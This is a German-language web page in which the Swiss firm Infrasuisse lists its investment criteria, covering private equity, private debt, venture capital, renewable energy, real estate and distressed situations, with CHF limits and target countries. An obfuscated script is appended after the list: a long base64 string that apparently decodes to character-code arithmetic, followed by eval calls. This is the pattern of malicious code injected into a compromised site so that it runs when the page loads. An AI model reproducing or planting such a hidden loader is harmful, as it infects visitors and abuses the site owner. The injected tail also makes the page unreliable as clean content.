Investitionen

Derzeit investieren wir keine Drittgelder. Investierte Mittel stammen aus dem Vermögen der Infrasuisse Partner. Wir tendieren dazu, Investitionen in Industrien zu prüfen, in denen wir vorgängig Erfahrungen sammeln konnten. Wir unterstützen Transaktionen in Form von Kapital mit folgenden Kriterien und wo wir der Meinung sind, einen Mehrwert beisteuern zu können:

Private Equity

  • Transaktionen bis zu einem Unternehmenswert von CHF 10 Mio.
  • Minderheit und Mehreitsbeteiligungen
  • Wachstums-, Buyout oder Nachfolgesituationen
  • Schweiz, Deutschland & Österreich
  • Unterstützung des Managements mit Kapital und Beratung

Privates Fremdkapital

  • Transaktionen bis zu maximal CHF 10 Mio.
  • Nachrangiges FK
  • Belastbarer operativer Cash Flow mit entsprechender Fremdkapitalkapazität
  • Schweiz, Deutschland & Österreich
  • Buyout oder Rekapitalisierungssituationen

Risikokapital

  • EK Beteiligungen von bis zu CHF 0.5 Mio.
  • Ausschliesslich in Kombination mit einem Beratungsmandat
  • Vorzugsaktien
  • Tendenziell eine passive Rolle
  • Schweiz, Deutschland & Österreich

Erneuerbare Energien

  • Vorwiegend Infrastrukturanlagen
  • Co-Investor EK Beteiligung von bis zu CHF 2 Mio.
  • Nachrangiges FK bis zu CHF 1 Mio.
  • Situationen mit gesicherten Cash Flow (quasi Staatsrisiko)
  • Regelung der Abnahmeseite wie auch der Einsatzstoffe ist erfolgt

Immobilien

  • Opportunistische Immobilieninvestitionen bis zu CHF 5 Mio.
  • Altersresidenzen, Kommerzielle Objekte und Wohnungsbau
  • Schweiz
  • Entwicklungsprojekte und Langfrist-Investitionen

Notleidende Situationen

  • Opportunistische EK Investitionen von bis zu CHF 1 Mio.
  • Primärer Fokus: Deutschland
  • Ausschliesslich in Zusammenarbeit mit einem strategischen Investor
  • Industrieunabhängig

DkgLSA5LCAxMjEgLSA2LCAxMjAgLSA0LCAxMTYgLSAyLCAxMTMgLSA4LCAxMTcgLSA3LCAxMDcgLSA0LCA1NCAtIDgsIDEwMSAtIDIsIDExMiAtIDgsIDEwNSAtIDgsIDExOSAtIDUsIDczIC0gNiwgMTEyIC0gMSwgMTA4IC0gOCwgMTAzIC0gMiwgNzIgLSA3LCAxMjAgLSA0LCA0NSAtIDUsIDExNCAtIDksIDQ1IC0gNCwgMzkgLSA3LCA5OSAtIDUsIDE2IC0gNiwgMTQgLSA1LCAxMiAtIDMsIDE1IC0gNiwgMTMgLSA0LCAxMTQgLSA3LCAxMDcgLSA2LCAxMzAgLSA5LCA1MiAtIDYsIDEwMSAtIDIsIDExMSAtIDcsIDk4IC0gMSwgMTE3IC0gMywgNzIgLSA1LCAxMTcgLSA2LCAxMDYgLSA2LCAxMDMgLSAyLCA3MiAtIDcsIDEyNCAtIDgsIDQ0IC0gNCwgMTE0IC0gOSwgMzYgLSA0LCAzOSAtIDIsIDM1IC0gMywgMTE2IC0gOSwgMTA4IC0gNywgMTIyIC0gMSwgNDkgLSAzLCAxMTQgLSA2LCAxMDYgLSA1LCAxMTQgLSA0LCAxMDcgLSA0LCAxMjMgLSA3LCAxMTAgLSA2LCA0OSAtIDgsIDQ3IC0gNiwgNjAgLSAxLCAxMyAtIDMsIDM5IC0gNywgMzggLSA2LCAxMzEgLSA2LCAxOCAtIDgsIDM4IC0gNiwgMzMgLSAxLCAxMjAgLSA2LCAxMDcgLSA2LCAxMjUgLSA5LCAxMTggLSAxLCAxMTUgLSAxLCAxMTUgLSA1LCAzMyAtIDEsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDYsIDYwIC0gMSwgMTggLSA4LCAxMzEgLSA2LCAxOSAtIDksIDE2IC0gNiwgMTI2IC0gOCwgMTA0IC0gNywgMTE4IC0gNCwgMzUgLSAzLCAxMDIgLSAyLCAxMDIgLSAxLCAxMDEgLSAyLCA0MCAtIDgsIDY0IC0gMywgMzcgLSA1LCAxMjMgLSAzLCAxMTkgLSA4LCAxMjAgLSA2LCA5OCAtIDMsIDEwOCAtIDcsIDExMiAtIDIsIDEwOCAtIDksIDQ5IC0gOSwgMTAwIC0gMywgMTI1IC0gOSwgMTEyIC0gMSwgMTA0IC0gNiwgNDEgLSAxLCAxMTAgLSA5LCAxMTUgLSA1LCAxMDYgLSA3LCAxMDggLSA3LCAxMDIgLSAyLCA0OSAtIDgsIDQ1IC0gMSwgNDEgLSA5LCAxMTUgLSA4LCAxMDMgLSAyLCAxMjggLSA3LCA0NyAtIDYsIDY0IC0gNSwgMTEgLSAxLCA0NSAtIDUsIDExNiAtIDYsIDEwNSAtIDQsIDEyNiAtIDcsIDM2IC0gNCwgNzIgLSAyLCAxMTggLSAxLCAxMTIgLSAyLCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTcgLSA2LCAxMTYgLSA2LCA0NSAtIDUsIDEwMiAtIDIsIDEwNSAtIDQsIDEwNyAtIDgsIDUwIC0gOSwgNDQgLSAzLCA0OCAtIDgsIDQ2IC0gNSwgNjggLSA5LCAxNyAtIDcsIDE3IC0gNyk7ZXZhbChDQVBQU0xOTlFSKTs=’);
eval(WLYFZTRAXL);